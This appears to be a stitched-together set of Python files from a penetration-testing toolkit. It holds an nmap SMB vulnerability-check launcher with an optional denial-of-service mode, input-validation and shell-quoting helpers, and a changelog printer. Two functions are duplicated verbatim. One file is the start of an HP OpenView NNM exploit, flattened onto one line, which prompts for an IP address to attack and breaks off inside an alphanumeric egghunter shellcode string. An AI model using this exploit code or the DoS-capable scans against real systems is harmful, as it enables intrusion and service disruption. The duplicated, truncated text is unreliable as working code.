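def get_target(counter, self_banner):
    """Prompt for the scan target until a usable value is entered.

    The value returned here is later substituted into an nmap command line
    that is executed through a shell, so the input is restricted to the
    characters that can appear in a host name, an IPv4 address, a CIDR block
    or an nmap octet range. Anything else is rejected and the prompt repeats.

    Args:
        counter: number of rejected entries so far; when it reaches 3 the
            "I can go on like this all day" notice is shown and the count
            starts over.
        self_banner: banner text reprinted after each rejected entry.

    Returns:
        The validated target string, stripped of surrounding whitespace.
    """
    # Allow-list instead of a deny-list: shell metacharacters, quotes and
    # whitespace never reach the command string built by the caller.
    safe_chars = set(
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789./-,"
    )
    prompt = """
 NOTE: A single host or a network/block can be specified for testing.
 examples: 192.168.1.21
 192.168.1.0/24

 Enter the host or range to be checked: """

    tries = counter
    # A loop replaces the original self-recursion, whose results were never
    # returned: a valid entry made after one rejection came back as None.
    while True:
        if tries == 3:
            print_banner()
            print(self_banner)
            sleep(1)
            print(" Just so you know...I can go on like this all day....")
            sleep(1)
            tries = 0

        target_input = raw_input(prompt).strip()

        well_formed = (
            target_input != ""
            and len(target_input.split(".")) == 4
            # a leading dash would be read by nmap as an option, not a target
            and not target_input.startswith("-")
            and all(ch in safe_chars for ch in target_input)
        )
        if well_formed:
            return target_input

        print_banner()
        print(self_banner)
        print(" *** YOU MUST ENTER A VALID HOST OR RANGE TO CHECK **")
        tries += 1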
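def get_target(counter, self_banner):
    """Prompt for the scan target until a usable value is entered.

    The value returned here is later substituted into an nmap command line
    that is executed through a shell, so the input is restricted to the
    characters that can appear in a host name, an IPv4 address, a CIDR block
    or an nmap octet range. Anything else is rejected and the prompt repeats.

    Args:
        counter: number of rejected entries so far; when it reaches 3 the
            "I can go on like this all day" notice is shown and the count
            starts over.
        self_banner: banner text reprinted after each rejected entry.

    Returns:
        The validated target string, stripped of surrounding whitespace.
    """
    # Allow-list instead of a deny-list: shell metacharacters, quotes and
    # whitespace never reach the command string built by the caller.
    safe_chars = set(
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789./-,"
    )
    prompt = """
 NOTE: A single host or a network/block can be specified for testing.
 examples: 192.168.1.21
 192.168.1.0/24

 Enter the host or range to be checked: """

    tries = counter
    # A loop replaces the original self-recursion, whose results were never
    # returned: a valid entry made after one rejection came back as None.
    while True:
        if tries == 3:
            print_banner()
            print(self_banner)
            sleep(1)
            print(" Just so you know...I can go on like this all day....")
            sleep(1)
            tries = 0

        target_input = raw_input(prompt).strip()

        well_formed = (
            target_input != ""
            and len(target_input.split(".")) == 4
            # a leading dash would be read by nmap as an option, not a target
            and not target_input.startswith("-")
            and all(ch in safe_chars for ch in target_input)
        )
        if well_formed:
            return target_input

        print_banner()
        print(self_banner)
        print(" *** YOU MUST ENTER A VALID HOST OR RANGE TO CHECK **")
        tries += 1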
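def nmapsmbcheckvulns_run():
    """Ask for a target and run nmap's smb-check-vulns script on port 445.

    The operator chooses between the default checks and the aggressive ones
    (``--script-args=unsafe=1``), which the prompt warns can cause a Denial
    of Service. The aggressive form is only built after an explicit
    "y"/"yes"; any answer other than yes or no is asked again instead of
    silently doing nothing.

    The target is shell-quoted before it is placed in the command string,
    because runnse() hands that string to a shell.
    """
    # Function-scope import keeps the block self-contained on both
    # interpreter lines: shlex.quote (Python 3) / pipes.quote (Python 2).
    try:
        from shlex import quote
    except ImportError:
        from pipes import quote

    self_banner = """
 ** Nmap Scripting Engine: Script - smb-check-vulns **
 ** **
 ** Checks a host or network MS08-067 **
 ** for vulnerability to: Conficker infection **
 ** regsvc DoS: (When enabled) **
 ** SMBv2 DoS: (When enabled) **
 *****************************************************************
 """

    # BEGIN MAIN EXECUTION
    counter = 0
    print_banner()
    print(self_banner)
    print(" <ctrl>-c at any time to Cancel")

    # get the host or network to operate on
    target = get_target(counter, self_banner)
    if not target:
        # Never format an empty or None target into the command line.
        print(" *** NO VALID TARGET WAS RETURNED - NOTHING TO RUN **")
        return

    prompt = """\n Do you want to enable aggressive testing (regsvc, SMBv2 DoS)?
 WARNING: these checks can cause a Denial of Service! [y|n]: """

    # enable or disable this script's arguments
    while True:
        aggressive = raw_input(prompt).strip().lower()
        if aggressive in ("y", "yes"):
            command = (
                "nmap --script smb-check-vulns --script-args=unsafe=1 -p445 %s"
                % quote(target)
            )
            break
        if aggressive in ("n", "no"):
            command = "nmap --script smb-check-vulns -p445 %s" % quote(target)
            break

    runnse(command)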
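def nmapsmbcheckvulns_run():
    """Ask for a target and run nmap's smb-check-vulns script on port 445.

    The operator chooses between the default checks and the aggressive ones
    (``--script-args=unsafe=1``), which the prompt warns can cause a Denial
    of Service. The aggressive form is only built after an explicit
    "y"/"yes"; any answer other than yes or no is asked again instead of
    silently doing nothing.

    The target is shell-quoted before it is placed in the command string,
    because runnse() hands that string to a shell.
    """
    # Function-scope import keeps the block self-contained on both
    # interpreter lines: shlex.quote (Python 3) / pipes.quote (Python 2).
    try:
        from shlex import quote
    except ImportError:
        from pipes import quote

    self_banner = """
 ** Nmap Scripting Engine: Script - smb-check-vulns **
 ** **
 ** Checks a host or network MS08-067 **
 ** for vulnerability to: Conficker infection **
 ** regsvc DoS: (When enabled) **
 ** SMBv2 DoS: (When enabled) **
 *****************************************************************
 """

    # BEGIN MAIN EXECUTION
    counter = 0
    print_banner()
    print(self_banner)
    print(" <ctrl>-c at any time to Cancel")

    # get the host or network to operate on
    target = get_target(counter, self_banner)
    if not target:
        # Never format an empty or None target into the command line.
        print(" *** NO VALID TARGET WAS RETURNED - NOTHING TO RUN **")
        return

    prompt = """\n Do you want to enable aggressive testing (regsvc, SMBv2 DoS)?
 WARNING: these checks can cause a Denial of Service! [y|n]: """

    # enable or disable this script's arguments
    while True:
        aggressive = raw_input(prompt).strip().lower()
        if aggressive in ("y", "yes"):
            command = (
                "nmap --script smb-check-vulns --script-args=unsafe=1 -p445 %s"
                % quote(target)
            )
            break
        if aggressive in ("n", "no"):
            command = "nmap --script smb-check-vulns -p445 %s" % quote(target)
            break

    runnse(command)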
def runnse(command):
    """Show the banner, run *command*, then wait for <enter>.

    NOTE(review): os.system() passes the whole string to a shell, so any
    user-supplied value must be validated or quoted by the caller before it
    is formatted into *command*. The exit status is not inspected.
    """
    pause_prompt = "\nPress <enter> to return...\n"

    print_banner()
    os.system(command)
    # Keep the scan output on screen until the operator acknowledges it.
    raw_input(pause_prompt)
#!/usr/bin/env python import socket import os import sys from time import sleep from bin.include import print_banner # Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r # One egg to rule them all. print_banner() try: target = sys.argv[4] except IndexError: print "HP OpenView NNM Exploit:\n" print """ ********************* NOTE ************************* If this exploit is not executed against the intended target chances are it will not succeed. <ctrl>-c to Cancel """ target = raw_input(" Enter the IP Address to Attack: ") egghunter = ("%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J" "MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5" "21*-q!au-q!au-oGSePAA%JMNU%521*-D" "A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1" "z1E-oRHEPAA%JMNU%521*-3s1--331--^" "TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
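#!/usr/bin/env python
"""Print the project CHANGELOG, then wait for <enter> before returning."""
import os
import sys

from bin.include import print_banner

# The changelog is located relative to the current working directory.
definepath = os.getcwd()
changelog_path = os.path.join(definepath, "readme", "CHANGELOG")

print_banner()
print('\n')
try:
    # Context manager closes the handle; the original file() call never did.
    with open(changelog_path, "r") as changelog:
        for line in changelog:
            print(line.rstrip())
except IOError as err:
    # Report a missing or unreadable changelog instead of a bare traceback.
    print("Unable to read %s: %s" % (changelog_path, err))

raw_input("\bHit enter to return to main menu.")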